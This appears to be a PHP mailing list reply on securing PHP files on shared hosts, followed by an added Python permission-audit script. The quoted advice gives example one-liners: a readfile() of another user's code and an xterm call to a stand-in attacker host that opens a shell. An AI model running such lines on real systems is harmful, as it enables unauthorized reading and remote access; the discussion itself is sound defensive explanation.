RE: Need help with file permissions for PHP files

[snip]
I think you have to face facts. There is no way you're going to have
your code secure against other users so long as it has to be readable
by apache.

One _PARTIAL_ solution: If like most linux distros, you have a group
called users, which contains every human user on the system, but
doesn't contain the apache user (nobody, apache, www, or something
else, depending on your sys.), you chmod your public_html directory to
701, and set group ownership to 'users'. This results in only you and
system users being able to access the public_html directory. I
emphasise however that this is only a partial solution, since someone
can write a php script, along the lines of '<?php
readfile('/home/otheruser/public_html/file_that_I_want_to_read.php');
?>', which will give them access to anything they want to read, that
is readable by apache. I guess you could do something similar with
write permissions and cache.txt



To add insult to injury, if your host allows CGI/Perl, there is a
cgishell script available that presents a virtual shell over CGI, that
would run as the apache user. I've never tried it, but I can't really
see anything stopping something like <?php system('xterm --display
evil_crackers_machine'); ?>, or perhaps even something even simpler,
to get an ordinary shell running as the apache user. I guess safe_mode
would help get around some of these problems, but as is written on the
PHP docs, it's the wrong way to solve such a problem (although I'm not
totally sure what the right way is), and it requires admin access.

I guess you could run your own web-server, on a high-numbered port,
and then you can do all the securing you like, but if you aren't the
admin, and the admin doesn't like doing 'extra work' then you're out
of luck. If you are friends with the admin, you could possibly ask him
to install suexec, and run your security-sensitive scripts through
CGI, under your own UID.
[/snip]


Two things Rory....

a. You only replied to me, instead of the list. You probably have to
click on "reply to all" in your mail client. I have included the list's
address for this reply, so that it will appear there.
2. "Because it reads out of order."
   "Why?"
   "Top posting is bad."
III. Trimming is good, because it gets right to the point.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
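The quoted advice above (chmod 701 on public_html with group 'users', and the observation that any file the web server can read is readable by every other user's PHP script) can be checked mechanically. The following audit is an added example, not code from this thread; it builds a constructed public_html layout in a temporary directory, applies the 701 mode, and reports which classes of user can list, traverse or read. The directory and file names (public_html, index.php, cache.txt) are taken from the thread; the function names are the example's own. Group ownership is not changed, since chgrp to 'users' needs that group to exist and the permission bits alone are what the audit inspects.

```python
#!/usr/bin/env python3
"""Audit a public_html-style directory for the "701 + group users" layout.

Added example for the thread above; assumes a POSIX filesystem and that
the human users share one group (which gets the middle permission digit)
while the web server runs as some other, unprivileged account (the
"other" digit).
"""
import os
import stat
import tempfile


def describe_dir_mode(mode):
    """Split a directory's permission bits into the three facts that matter
    for the 701 recipe: is the group (all human users) locked out, can
    "other" (the web server) traverse, and can "other" list the directory?"""
    perm = stat.S_IMODE(mode)
    group_locked_out = (perm & (stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP)) == 0
    other_can_traverse = bool(perm & stat.S_IXOTH)   # x on the dir: reach files by name
    other_can_list = bool(perm & stat.S_IROTH)       # r on the dir: enumerate the names
    return group_locked_out, other_can_traverse, other_can_list


def audit_public_html(path):
    """Return a findings dict for the directory at `path`.

    Files listed under world_readable_files are exactly the ones another
    user's PHP script, running as the web server, could readfile() once it
    knows the name; world_writable_files is the cache.txt case."""
    dir_mode = os.stat(path).st_mode
    group_locked_out, other_can_traverse, other_can_list = describe_dir_mode(dir_mode)
    findings = {
        "dir_mode": oct(stat.S_IMODE(dir_mode)),
        "group_locked_out": group_locked_out,
        "other_can_traverse": other_can_traverse,
        "other_can_list": other_can_list,
        "world_readable_files": [],
        "world_writable_files": [],
    }
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            rel = os.path.relpath(full, path)
            fmode = os.stat(full).st_mode
            if fmode & stat.S_IROTH:
                findings["world_readable_files"].append(rel)
            if fmode & stat.S_IWOTH:
                findings["world_writable_files"].append(rel)
    findings["world_readable_files"].sort()
    findings["world_writable_files"].sort()
    return findings


def demo():
    """Build a constructed public_html in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        public_html = os.path.join(tmp, "public_html")
        os.mkdir(public_html)
        os.chmod(public_html, 0o701)  # the recipe from the thread

        index_php = os.path.join(public_html, "index.php")
        with open(index_php, "w") as f:
            f.write("<?php echo 'constructed sample'; ?>\n")
        os.chmod(index_php, 0o644)    # readable by the web server, so by everyone's scripts

        cache_txt = os.path.join(public_html, "cache.txt")
        with open(cache_txt, "w") as f:
            f.write("constructed cache contents\n")
        os.chmod(cache_txt, 0o666)    # the write-permission case mentioned in the thread

        return audit_public_html(public_html)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The output shows the partial nature of the fix in one glance: group_locked_out is true (other humans cannot even enter the directory), other_can_list is false (the web server cannot enumerate names), but other_can_traverse is true and every script the server must read appears under world_readable_files, which is precisely what a readfile() call from another account exploits. Moving the sensitive scripts under suexec or a per-user server, as the thread suggests, is what changes that last list, not any further chmod.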